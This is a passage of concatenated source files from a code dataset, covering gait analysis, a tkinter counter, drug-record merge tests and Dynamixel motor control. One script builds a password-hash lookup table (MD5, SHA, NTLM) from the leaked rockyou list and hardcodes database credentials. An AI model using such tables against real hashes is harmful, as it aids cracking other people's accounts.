= (l_PSIS + r_PSIS) / 2\n vertical_vector = C7 - middle_PSIS\n trunk_ml_angle = 180 / np.pi * np.arctan(vertical_vector[:, 0] / vertical_vector[:, 2])\n trunk_ap_angle = 180 / np.pi * np.arctan(vertical_vector[:, 1] / vertical_vector[:, 2])\n return trunk_ml_angle, trunk_ap_angle\n\n @staticmethod\n def check_trunk_angles(trunk_ml_angle, trunk_ap_angle):\n plt.figure()\n plt.plot(trunk_ml_angle)\n plt.title('trunk swag')\n plt.figure()\n plt.plot(trunk_ap_angle)\n plt.title('trunk inclination')\n\n @staticmethod\n def get_projected_points(p0, p1, p2):\n \"\"\"\n Project one point on a line in a 2D space\n :param p0: Coordinates of the toe\n :param p1: Coordinates of the heel\n :param p2: Coordinates of the COP\n :return:\n \"\"\"\n [a0, b0] = p0\n [a1, b1] = p1\n [a2, b2] = p2\n the_mat = np.matrix([[a0 - a1, b0 - b1],\n [b1 - b0, a0 - a1]])\n the_array = np.array([a0 * a2 - a1 * a2 + b0 * b2 - b1 * b2, a0 * b1 - a1 * b1 - b0 * a1 + a1 * b1])\n projected_point = np.matmul(the_mat.I, the_array.T)\n return projected_point\n\n @staticmethod\n def __save_data(folder_path, trial_name, data_all_df):\n # save param data\n data_file_str = '{folder_path}\\\\param_of_{trial_name}.csv'.format(\n folder_path=folder_path, trial_name=trial_name)\n data_all_df.to_csv(data_file_str, index=False)\n\n def get_strike_off_from_imu(self, gait_data_df, param_data_df, sensor_sampling_rate, check_strike_off=True,\n plot_the_strike_off=False):\n if sensor_sampling_rate == HAISHENG_SENSOR_SAMPLE_RATE:\n my_detector = StrikeOffDetectorIMU(self._current_trial, gait_data_df, param_data_df, 'r_foot',\n HAISHENG_SENSOR_SAMPLE_RATE)\n strike_delay, off_delay = 4, 4 # delay from the peak\n elif sensor_sampling_rate == MOCAP_SAMPLE_RATE:\n my_detector = StrikeOffDetectorIMU(self._current_trial, gait_data_df, param_data_df, 'l_foot',\n MOCAP_SAMPLE_RATE)\n strike_delay, off_delay = 8, 6 # delay from the peak\n else:\n raise ValueError('Wrong sensor sampling rate value')\n estimated_strike_indexes, estimated_off_indexes = my_detector.get_walking_strike_off(strike_delay, off_delay)\n if plot_the_strike_off:\n my_detector.show_IMU_data_and_strike_off(estimated_strike_indexes, estimated_off_indexes)\n data_len = gait_data_df.shape[0]\n estimated_strikes, estimated_offs = np.zeros([data_len]), np.zeros([data_len])\n estimated_strikes[estimated_strike_indexes] = 1\n estimated_offs[estimated_off_indexes] = 1\n if check_strike_off:\n my_detector.true_esti_diff(estimated_strike_indexes, 'strikes')\n my_detector.true_esti_diff(estimated_off_indexes, 'offs')\n return estimated_strikes, estimated_offs\n\n def get_strike_off_from_imu_lfilter(self, gait_data_df, param_data_df, sensor_sampling_rate, check_strike_off=True,\n plot_the_strike_off=False):\n \"\"\"\n In the filter, lfilter was used so there are delays in the detected events (about 50 samples)\n \"\"\"\n if sensor_sampling_rate == HAISHENG_SENSOR_SAMPLE_RATE:\n my_detector = StrikeOffDetectorIMUFilter(self._current_trial, gait_data_df, param_data_df, 'r_foot',\n HAISHENG_SENSOR_SAMPLE_RATE)\n strike_delay, off_delay = 6, 5 # delay from the peak\n elif sensor_sampling_rate == MOCAP_SAMPLE_RATE:\n my_detector = StrikeOffDetectorIMUFilter(self._current_trial, gait_data_df, param_data_df, 'l_foot',\n MOCAP_SAMPLE_RATE)\n strike_delay, off_delay = 10, 10 # delay from the peak\n else:\n raise ValueError('Wrong sensor sampling rate value')\n estimated_strike_indexes, estimated_off_indexes = my_detector.get_walking_strike_off(strike_delay, off_delay)\n if plot_the_strike_off:\n 
my_detector.show_IMU_data_and_strike_off(estimated_strike_indexes, estimated_off_indexes)\n data_len = gait_data_df.shape[0]\n estimated_strikes, estimated_offs = np.zeros([data_len]), np.zeros([data_len])\n estimated_strikes[estimated_strike_indexes] = 1\n estimated_offs[estimated_off_indexes] = 1\n if check_strike_off:\n my_detector.true_esti_diff(estimated_strike_indexes, 'strikes')\n my_detector.true_esti_diff(estimated_off_indexes, 'offs')\n return estimated_strikes, estimated_offs\n\n # FPA of all the samples\n def get_FPA_all(self, gait_data_df):\n l_toe = gait_data_df[['LFM2_x', 'LFM2_y', 'LFM2_z']].values\n l_heel = gait_data_df[['LFCC_x', 'LFCC_y', 'LFCC_z']].values\n\n forward_vector = l_toe - l_heel\n left_FPAs = - 180 / np.pi * np.arctan2(forward_vector[:, 0], forward_vector[:, 1])\n\n r_toe = gait_data_df[['RFM2_x', 'RFM2_y', 'RFM2_z']].values\n r_heel = gait_data_df[['RFCC_x', 'RFCC_y', 'RFCC_z']].values\n\n forward_vector = r_toe - r_heel\n right_FPAs = 180 / np.pi * np.arctan2(forward_vector[:, 0], forward_vector[:, 1])\n\n return np.column_stack([left_FPAs, right_FPAs])\n\n def get_FPA_steps(self, gait_data_df, FPA_all, steps):\n FPA_steps = []\n for step in steps:\n sample_20_gait_phase = int(round(step[0] + 0.2 * (step[1] - step[0])))\n sample_80_gait_phase = int(round(step[0] + 0.8 * (step[1] - step[0])))\n FPA_step = np.mean(FPA_all[sample_20_gait_phase:sample_80_gait_phase])\n marker_frame = gait_data_df.loc[round((step[0] + step[1]) / 2), 'marker_frame']\n FPA_steps.append([FPA_step, marker_frame])\n return FPA_steps\n\n def get_legal_steps(self, strikes, offs, side, gait_data_df=None):\n \"\"\"\n Sometimes subjects have their both feet on the ground so it is necessary to do step check.\n :param strikes:\n :param offs:\n :param side:\n :param gait_data_df:\n :return:\n \"\"\"\n stance_phase_sample_thd_lower = 0.3 * self._current_fre\n stance_phase_sample_thd_higher = 1 * self._current_fre\n\n strike_tuple = np.where(strikes == 1)[0]\n off_tuple = np.where(offs == 1)[0]\n steps = []\n abandoned_step_num = 0\n\n for strike in strike_tuple:\n off = off_tuple[strike + stance_phase_sample_thd_lower < off_tuple]\n off = off[off < strike + stance_phase_sample_thd_higher]\n if len(off) == 1:\n off = off[0]\n steps.append([strike, off])\n else:\n abandoned_step_num += 1\n\n print('For {side} foot steps, {step_num} steps abandonded'.format(side=side, step_num=abandoned_step_num))\n if self.__check_steps:\n plt.figure()\n if side == 'l':\n grf_z = gait_data_df['f_1_z'].values\n elif side == 'r':\n grf_z = gait_data_df['f_2_z'].values\n else:\n raise ValueError('Wrong side value')\n\n for step in steps:\n plt.plot(grf_z[step[0]:step[1]])\n plt.show()\n return steps\n\n def insert_param_data(self, gait_data_df, insert_list, column_name):\n data_len = gait_data_df.shape[0]\n insert_data = np.zeros([data_len])\n for item in insert_list:\n row_index = gait_data_df.index[gait_data_df['marker_frame'] == item[1]]\n if len(row_index) == 0:\n row_index = gait_data_df.index[gait_data_df['marker_frame'] == item[1] + 1]\n insert_data[row_index[0]] = item[0]\n gait_data_df.insert(len(gait_data_df.columns), column_name, insert_data)\n\n @staticmethod\n def __law_of_cosines(vector1, vector2):\n vector3 = vector1 - vector2\n num = inner1d(vector1, vector1) + \\\n inner1d(vector2, vector2) - inner1d(vector3, vector3)\n den = 2 * np.sqrt(inner1d(vector1, vector1)) * np.sqrt(inner1d(vector2, vector2))\n return 180 / np.pi * np.arccos(num / den)\n\n\nclass TrunkStaticProcessor(ParamProcessor):\n 
def __init__(self, sub_name, readme_xls, plot_strike_off=False,\n initialize_100Hz=True, initialize_200Hz=True):\n super().__init__(sub_name, readme_xls, trials=[], plot_strike_off=plot_strike_off,\n initialize_100Hz=initialize_100Hz, initialize_200Hz=initialize_200Hz)\n self._trials = ['static trunk']\n\n def init_trial_params(self, gait_data_df, sensor_sampling_rate):\n trunk_ml_angle, trunk_ap_angle = self.get_trunk_angles(gait_data_df)\n # self.check_trunk_angles(trunk_ml_angle, trunk_ap_angle)\n param_data = np.column_stack([trunk_ml_angle, trunk_ap_angle])\n param_data_df = pd.DataFrame(param_data)\n param_data_df.columns = ['trunk_ml_angle', 'trunk_ap_angle']\n param_data_df.insert(0, 'marker_frame', gait_data_df['marker_frame'])\n return param_data_df\n","sub_path":"1_param_processing/ParameterProcessor.py","file_name":"ParameterProcessor.py","file_ext":"py","file_size_in_byte":20234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"268201778","text":"from tkinter import *\nMainWindow = Tk()\n\ncounter = 0\n\ndef fungsi_1():\n\tglobal counter\n\tcounter +=1\n\tprint('hello world ',counter)\n\tLabel1.config(text=counter)\n\ndef fungsi_2():\n\tglobal counter\n\tcounter -=1\n\tprint('hello world ',counter)\n\tLabel1.config(text=counter)\n\nButton1 = Button(MainWindow, text='+', command=fungsi_1)\nButton2 = Button(MainWindow, text='-', command=fungsi_2)\nLabel1 = Label(MainWindow, text = '0')\n\nLabel1.pack()\nButton1.pack(side = LEFT)\nButton2.pack(side = LEFT)\nMainWindow.geometry('400x400+200+200')\nMainWindow.mainloop()","sub_path":"Gui-Button/Btn.py","file_name":"Btn.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"434663924","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\nimport sys\nimport time\nimport hashlib\n\ntry:\n conn = psycopg2.connect(\n dbname='rainbowtables',\n user='imtadmin',\n host='localhost',\n password='5tgb6yhn'\n )\n\n print(\"You are connected to 'rainbowtables'!\")\n\n cur = conn.cursor()\n f = open('rockyou.txt', encoding='ISO-8859-1')\n f2 = open('top_100_pw')\n count = 0\n for l in f:\n rank = 0\n found = False\n actual_line = l.strip('\\n')\n for line in f2:\n stripped_line = line.strip('\\n')\n rank = int(stripped_line.split(' ')[0])\n curr_pw = stripped_line.split(' ')[1]\n if actual_line == curr_pw:\n found = True\n break\n f2.seek(0)\n\n encoded = actual_line.encode()\n encoded_utf16le = actual_line.encode('utf-16le')\n\n m = str(hashlib.md5(encoded).hexdigest())\n s2 = str(hashlib.sha256(encoded).hexdigest())\n s5 = str(hashlib.sha512(encoded).hexdigest())\n n = str(hashlib.new('md4', encoded_utf16le).hexdigest())\n\n if found:\n sql = 'INSERT INTO rainbow VALUES(DEFAULT, %s, 0, 0, true, %s, %s, %s, %s, %s);'\n cur.execute(sql, (actual_line,rank,m,n,s2,s5))\n elif not found:\n sql = 'INSERT INTO rainbow VALUES(DEFAULT, %s, 0, 0, true, -1, %s, %s, %s, %s);'\n cur.execute(sql, (actual_line,m,n,s2,s5))\n count += 1\n print(count)\n conn.commit()\n\nexcept psycopg2.DatabaseError as e:\n if conn:\n conn.rollback()\n print(\"Error at line %s: %s\" % (str(count),e))\n sys.exit(1)\n\nfinally:\n if conn:\n conn.close()","sub_path":"insert_database.py","file_name":"insert_database.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"607264618","text":"\"\"\"Test merged record 
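The rainbow-table loader earlier in this line hashes each password four ways, including the NTLM-style MD4 over UTF-16LE bytes. A self-contained sketch of just that hashing step; note that hashlib.new('md4') only works when the underlying OpenSSL build still exposes MD4 (OpenSSL 3.x often relegates it to the legacy provider):

```python
import hashlib

def password_digests(password: str) -> dict:
    raw = password.encode()                    # UTF-8 bytes for MD5/SHA-2
    raw_utf16le = password.encode('utf-16le')  # NTLM hashes MD4 of UTF-16LE
    return {
        'md5': hashlib.md5(raw).hexdigest(),
        'sha256': hashlib.sha256(raw).hexdigest(),
        'sha512': hashlib.sha512(raw).hexdigest(),
        # may raise ValueError on builds where MD4 is unavailable
        'ntlm': hashlib.new('md4', raw_utf16le).hexdigest(),
    }

# password_digests('password')['ntlm'] -> '8846f7eaee8fb117ad06bdd830b7586c'
```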
generation.\"\"\"\nimport pytest\nfrom therapy.etl.merge import Merge\nfrom therapy.schemas import ApprovalStatus\nfrom typing import Dict\n\n\n@pytest.fixture(scope='module')\ndef merge_handler(mock_database):\n \"\"\"Provide Merge instance to test cases.\"\"\"\n class MergeHandler:\n def __init__(self):\n self.merge = Merge(mock_database())\n\n def get_merge(self):\n return self.merge\n\n def create_merged_concepts(self, record_ids):\n return self.merge.create_merged_concepts(record_ids)\n\n def get_added_records(self):\n return self.merge._database.added_records\n\n def get_updates(self):\n return self.merge._database.updates\n\n def create_record_id_set(self, record_id):\n return self.merge._create_record_id_set(record_id)\n\n def generate_merged_record(self, record_id_set):\n return self.merge._generate_merged_record(record_id_set)\n\n def get_created_id_groups(self):\n return self.merge._groups()\n\n return MergeHandler()\n\n\ndef compare_merged_records(actual: Dict, fixture: Dict):\n \"\"\"Check that records are identical.\"\"\"\n assert actual['concept_id'] == fixture['concept_id']\n assert actual['label_and_type'] == fixture['label_and_type']\n assert ('label' in actual) == ('label' in fixture)\n if 'label' in actual or 'label' in fixture:\n assert actual['label'] == fixture['label']\n assert ('trade_names' in actual) == ('trade_names' in fixture)\n if 'trade_names' in actual or 'trade_names' in fixture:\n assert set(actual['trade_names']) == set(fixture['trade_names'])\n assert ('aliases' in actual) == ('aliases' in fixture)\n if 'aliases' in actual or 'aliases' in fixture:\n assert set(actual['aliases']) == set(fixture['aliases'])\n\n assert ('xrefs' in actual) == ('xrefs' in fixture)\n if 'xrefs' in actual or 'xrefs' in fixture:\n assert set(actual['xrefs']) == set(fixture['xrefs'])\n assert ('associated_with' in actual) == ('associated_with' in fixture)\n if 'associated_with' in actual or 'associated_with' in fixture:\n assert set(actual['associated_with']) == \\\n set(fixture['associated_with'])\n\n assert ('approval_status' in actual) == ('approval_status' in fixture)\n if 'approval_status' in actual or 'approval_status' in fixture:\n assert set(actual['approval_status']) == \\\n set(fixture['approval_status'])\n assert ('approval_year' in actual) == ('approval_year' in fixture)\n if 'approval_year' in actual or 'approval_year' in fixture:\n assert set(actual['approval_year']) == set(fixture['approval_year'])\n assert ('fda_indication' in actual) == ('fda_indication' in fixture)\n if 'fda_indication' in actual or 'fda_indication' in fixture:\n actual_inds = actual['fda_indication'].copy()\n fixture_inds = fixture['fda_indication'].copy()\n assert len(actual_inds) == len(fixture_inds)\n actual_inds.sort(key=lambda x: x[0])\n fixture_inds.sort(key=lambda x: x[0])\n for i in range(len(actual_inds)):\n assert actual_inds[i] == fixture_inds[i]\n\n\n@pytest.fixture(scope='module')\ndef phenobarbital_merged():\n \"\"\"Create phenobarbital fixture.\"\"\"\n return {\n \"label_and_type\": \"rxcui:8134##merger\",\n \"concept_id\": \"rxcui:8134\",\n \"xrefs\": [\n \"ncit:C739\",\n \"drugbank:DB01174\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\"\n ],\n \"aliases\": [\n '5-Ethyl-5-phenyl-2,4,6(1H,3H,5H)-pyrimidinetrione',\n '5-Ethyl-5-phenyl-pyrimidine-2,4,6-trione',\n '5-Ethyl-5-phenylbarbituric acid',\n '5-Phenyl-5-ethylbarbituric acid',\n '5-ethyl-5-phenyl-2,4,6(1H,3H,5H)-pyrimidinetrione',\n '5-ethyl-5-phenylpyrimidine-2,4,6(1H,3H,5H)-trione',\n 'Acid, Phenylethylbarbituric',\n 
'APRD00184',\n 'Fenobarbital',\n 'Luminal®',\n 'PHENO',\n 'Phenemal',\n 'PHENOBARBITAL',\n 'PHENobarbital',\n 'Phenobarbital',\n 'Phenobarbital (substance)',\n 'Phenobarbital-containing product',\n 'Phenobarbitol',\n 'Phenobarbitone',\n 'Phenobarbituric Acid',\n 'Phenylaethylbarbitursaeure',\n 'Phenylbarbital',\n 'Phenylethylbarbiturate',\n 'Phenylethylbarbituric Acid',\n 'Phenylethylbarbitursaeure',\n 'Phenyläthylbarbitursäure',\n 'Phenylethylbarbitursäure',\n 'PHENYLETHYLMALONYLUREA',\n 'Phenylethylmalonylurea',\n 'Product containing phenobarbital (medicinal product)',\n 'fenobarbital',\n 'phenobarbital',\n 'phenobarbital sodium',\n 'phenylethylbarbiturate'\n ],\n \"associated_with\": [\n \"pubchem.compound:4763\",\n \"usp:m63400\",\n \"gsddb:2179\",\n \"snomedct:51073002\",\n \"vandf:4017422\",\n \"mmsl:2390\",\n \"msh:D010634\",\n \"snomedct:373505007\",\n \"mmsl:5272\",\n \"mthspl:YQE403BP4D\",\n \"fdbmk:001406\",\n \"mmsl:d00340\",\n \"atc:N03AA02\",\n \"fda:YQE403BP4D\",\n \"umls:C0031412\",\n \"chebi:CHEBI:8069\",\n \"chembl:CHEMBL40\"\n ],\n \"label\": \"Phenobarbital\",\n }\n\n\n@pytest.fixture(scope='module')\ndef cisplatin_merged():\n \"\"\"Create cisplatin fixture.\"\"\"\n return {\n \"label_and_type\": \"rxcui:2555##merger\",\n \"concept_id\": \"rxcui:2555\",\n \"xrefs\": [\n \"ncit:C376\",\n \"drugbank:DB00515\",\n \"hemonc:105\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\"\n ],\n \"trade_names\": [\n \"Cisplatin\",\n \"Platinol\"\n ],\n \"aliases\": [\n '1,2-Diaminocyclohexaneplatinum II citrate',\n 'APRD00359',\n 'CDDP',\n 'CISplatin',\n 'Cis-DDP',\n 'CIS-DDP',\n 'DACP',\n 'DDP',\n 'Diamminodichloride, Platinum',\n 'Dichlorodiammineplatinum',\n 'Platinum Diamminodichloride',\n 'cis Diamminedichloroplatinum',\n 'cis Platinum',\n 'cis-Diaminedichloroplatinum',\n 'cis-Diamminedichloroplatinum',\n 'cis-diamminedichloroplatinum(II)',\n 'cis-Diamminedichloroplatinum(II)',\n 'cis-Dichlorodiammineplatinum(II)',\n 'cisplatinum',\n 'cis-Platinum',\n 'cis-platinum',\n 'cisplatino',\n 'cis-diamminedichloroplatinum(II)',\n 'cis-diamminedichloroplatinum III',\n 'NSC 119875',\n 'Platinol-AQ',\n 'Platinol'\n ],\n \"label\": \"cisplatin\",\n \"associated_with\": [\n \"umls:C0008838\",\n \"fda:Q20Q21Q62J\",\n \"usp:m17910\",\n \"vandf:4018139\",\n \"mesh:D002945\",\n \"mthspl:Q20Q21Q62J\",\n \"mmsl:d00195\",\n \"atc:L01XA01\",\n \"mmsl:31747\",\n \"mmsl:4456\",\n \"pubchem.compound:5702198\",\n \"unii:Q20Q21Q62J\",\n \"inchikey:LXZZYRPGZAFOLE-UHFFFAOYSA-L\",\n \"chembl:CHEMBL11359\",\n ],\n \"approval_status\": ApprovalStatus.APPROVED,\n \"approval_year\": [\"1978\"],\n \"fda_indication\": [\n [\"hemonc:671\", \"Testicular cancer\", \"ncit:C7251\"],\n [\"hemonc:645\", \"Ovarian cancer\", \"ncit:C7431\"],\n [\"hemonc:569\", \"Bladder cancer\", \"ncit:C9334\"]\n ],\n }\n\n\n@pytest.fixture(scope='module')\ndef spiramycin_merged():\n \"\"\"Create fixture for spiramycin. 
The RxNorm entry should be inaccessible\n to this group.\n \"\"\"\n return {\n \"label_and_type\": \"ncit:c839##merger\",\n \"concept_id\": \"ncit:C839\",\n \"xrefs\": [\n 'chemidplus:8025-81-8',\n ],\n \"label\": \"Spiramycin\",\n \"aliases\": [\n \"SPIRAMYCIN\",\n \"Antibiotic 799\",\n \"Rovamycin\",\n \"Provamycin\",\n \"Rovamycine\",\n \"RP 5337\",\n \"(4R,5S,6R,7R,9R,10R,11E,13E,16R)-10-{[(2R,5S,6R)-5-(dimethylamino)-6-methyltetrahydro-2H-pyran-2-yl]oxy}-9,16-dimethyl-5-methoxy-2-oxo-7-(2-oxoethyl)oxacyclohexadeca-11,13-dien-6-yl 3,6-dideoxy-4-O-(2,6-dideoxy-3-C-methyl-alpha-L-ribo-hexopyranosyl)-3-(dimethylamino)-alpha-D-glucopyranoside\" # noqa: E501\n ],\n \"associated_with\": [\n \"umls:C0037962\",\n \"fda:71ODY0V87H\"\n ],\n }\n\n\n@pytest.fixture(scope='module')\ndef record_id_groups():\n \"\"\"Create fixture for concept group sets.\"\"\"\n return {\n \"rxcui:8134\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"ncit:C739\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"chemidplus:50-06-6\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"wikidata:Q407241\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"drugbank:DB01174\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"ncit:C839\": {\n \"ncit:C839\",\n \"chemidplus:8025-81-8\",\n },\n \"chemidplus:8025-81-8\": {\n \"ncit:C839\",\n \"chemidplus:8025-81-8\",\n },\n \"rxcui:2555\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"ncit:C376\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"chemidplus:15663-27-1\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"wikidata:Q412415\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"wikidata:Q47522001\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"drugbank:DB00515\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"hemonc:105\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"rxcui:4126\": {\n \"rxcui:4126\",\n \"wikidata:Q47521576\",\n \"drugbank:DB01143\"\n },\n \"wikidata:Q47521576\": {\n \"rxcui:4126\",\n \"wikidata:Q47521576\",\n \"drugbank:DB01143\"\n },\n \"drugbank:DB01143\": {\n \"rxcui:4126\",\n \"wikidata:Q47521576\",\n \"drugbank:DB01143\"\n },\n \"ncit:C49236\": {\n \"ncit:C49236\"\n }\n }\n\n\ndef test_create_record_id_set(merge_handler, record_id_groups):\n \"\"\"Test creation of record ID sets. 
Queries DB and matches against\n record_id_groups fixture.\n \"\"\"\n # build groups from keys\n for record_id in record_id_groups.keys():\n new_group = merge_handler.create_record_id_set(record_id)\n for concept_id in new_group:\n merge_handler.merge._groups[concept_id] = new_group\n groups = merge_handler.merge._groups\n\n # perform checks\n for concept_id in groups.keys():\n assert groups[concept_id] == record_id_groups[concept_id]\n assert len(groups) == len(record_id_groups) # check if any are missing\n\n # test dead reference\n has_dead_ref = 'ncit:C107245'\n dead_group = merge_handler.create_record_id_set(has_dead_ref)\n assert dead_group == {has_dead_ref}\n\n\ndef test_generate_merged_record(merge_handler, record_id_groups,\n phenobarbital_merged, cisplatin_merged,\n spiramycin_merged):\n \"\"\"Test generation of merged record method.\"\"\"\n phenobarbital_ids = record_id_groups['rxcui:8134']\n merge_response = merge_handler.generate_merged_record(phenobarbital_ids)\n compare_merged_records(merge_response, phenobarbital_merged)\n\n cisplatin_ids = record_id_groups['rxcui:2555']\n merge_response = merge_handler.generate_merged_record(cisplatin_ids)\n compare_merged_records(merge_response, cisplatin_merged)\n\n spiramycin_ids = record_id_groups['ncit:C839']\n merge_response = merge_handler.generate_merged_record(spiramycin_ids)\n compare_merged_records(merge_response, spiramycin_merged)\n\n\ndef test_create_merged_concepts(merge_handler, record_id_groups,\n phenobarbital_merged, cisplatin_merged,\n spiramycin_merged):\n \"\"\"Test end-to-end creation and upload of merged concepts.\"\"\"\n record_ids = record_id_groups.keys()\n merge_handler.create_merged_concepts(record_ids)\n\n # check merged record generation and storage\n added_records = merge_handler.get_added_records()\n assert len(added_records) == 4\n\n phenobarb_merged_id = phenobarbital_merged['concept_id']\n assert phenobarb_merged_id in added_records.keys()\n compare_merged_records(added_records[phenobarb_merged_id],\n phenobarbital_merged)\n\n cispl_merged_id = cisplatin_merged['concept_id']\n assert cispl_merged_id in added_records.keys()\n compare_merged_records(added_records[cispl_merged_id], cisplatin_merged)\n\n spira_merged_id = spiramycin_merged['concept_id']\n assert spira_merged_id in added_records.keys()\n compare_merged_records(added_records[spira_merged_id],\n spiramycin_merged)\n\n # check merged record reference updating\n updates = merge_handler.get_updates()\n for concept_id in record_id_groups['rxcui:8134']:\n assert updates[concept_id] == {\n 'merge_ref': phenobarbital_merged['concept_id'].lower()\n }\n for concept_id in record_id_groups['rxcui:2555']:\n assert updates[concept_id] == {\n 'merge_ref': cisplatin_merged['concept_id'].lower()\n }\n for concept_id in record_id_groups['ncit:C839']:\n assert updates[concept_id] == {\n 'merge_ref': spiramycin_merged['concept_id'].lower()\n }\n\n # no merged record for ncit:C49236 should be generated\n assert len(updates) == len(record_id_groups) - 1\n assert 'ncit:C49236' not in updates\n","sub_path":"tests/unit/test_merge.py","file_name":"test_merge.py","file_ext":"py","file_size_in_byte":15663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"175723970","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Convert to a dictionary in one line code using list comprehension\n\n# In[1]:\n\n\nlist1=[1,2,3,4,5,7,8]\nlist2=[\"a\",\"b\",\"c\",\"d\",\"e\"]\n\n\n# In[2]:\n\n\nlist1 = [1, 2, 3,4, 5, 6, 7, 8]\nlist2 = 
[\"a\", \"b\", \"c\", \"d\", \"e\"]\nfor each in list1:\n list2.append((each))\nprint (list2)\n\n","sub_path":"Assignments6/Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"302927915","text":"#!/usr/bin/env python\n\nimport rospy\nimport os\nimport ctypes\nfrom beginner_tutorials.msg import Data\n\nif os.name == 'nt':\n import msvcrt\n def getch():\n return msvcrt.getch().decode()\nelse:\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n def getch():\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n#os.sys.path.append('../dynamixel_functions_py') # Path setting\n\nimport dynamixel_functions as dynamixel # Uses Dynamixel SDK library\n\n# Control table address\nADDR_MX_TORQUE_ENABLE = 24 # Control table address is different in #Dynamixel model\nADDR_MX_GOAL_TORQUE = 71\nADDR_MX_TORQUE_CONT\t = 70\n\n# Data Byte Length\nLEN_MX_GOAL_TORQUE = 2\nLEN_MX_TORQUE_CTRL = 1\n\n# Protocol version\nPROTOCOL_VERSION = 1 # See which protocol version is used in the Dynamixel\n\n# Default setting\nDXL1_ID = 1 # Dynamixel ID: 1\n\nBAUDRATE = 1000000\nDEVICENAME = \"/dev/ttyUSB0\".encode('utf-8')# Check which port is being used on your controller\n # ex) Windows: \"COM1\" Linux: \"/dev/ttyUSB0\"\n\nTORQUE_ENABLE = 1 # Value for enabling the torque\nTORQUE_DISABLE = 0 # Value for disabling the torque\n\nDXL_MOVING_STATUS_THRESHOLD = 3 # Dynamixel moving status threshold\n\nESC_ASCII_VALUE = 0x1b\n\nCOMM_SUCCESS = 0 # Communication Success result value\nCOMM_TX_FAIL = -1001 # Communication Tx Failed\n\nport_num = dynamixel.portHandler(DEVICENAME)\n\n# Initialize PacketHandler Structs\ndynamixel.packetHandler()\n\n# Initialize Groupsyncwrite instance\ngroup_num = dynamixel.groupSyncWrite(port_num, PROTOCOL_VERSION, ADDR_MX_GOAL_TORQUE, LEN_MX_GOAL_TORQUE)\ntorque_mode_on = dynamixel.groupSyncWrite(port_num, PROTOCOL_VERSION, ADDR_MX_TORQUE_CONT, LEN_MX_TORQUE_CTRL)\n\ndxl_comm_result = COMM_TX_FAIL # Communication result\n\ndef callback(data):\n\trospy.loginfo(data.data)\n\tdxl_torcon(data.data)\n\ndef dxl_torcon(goal_torq):\n\t # Write goal position\n dynamixel.write2ByteTxRx(port_num, PROTOCOL_VERSION, 1, ADDR_MX_GOAL_TORQUE, goal_torq[0])\n if dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION) != COMM_SUCCESS:\n dynamixel.printTxRxResult(PROTOCOL_VERSION, dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION))\n elif dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION) != 0:\n dynamixel.printRxPacketError(PROTOCOL_VERSION, dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION))\n\ndef torque_ctrl():\n\tdynamixel.write1ByteTxRx(port_num, PROTOCOL_VERSION, 1, ADDR_MX_TORQUE_CONT, 1)\n\tif dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION) != COMM_SUCCESS:\n\t dynamixel.printTxRxResult(PROTOCOL_VERSION, 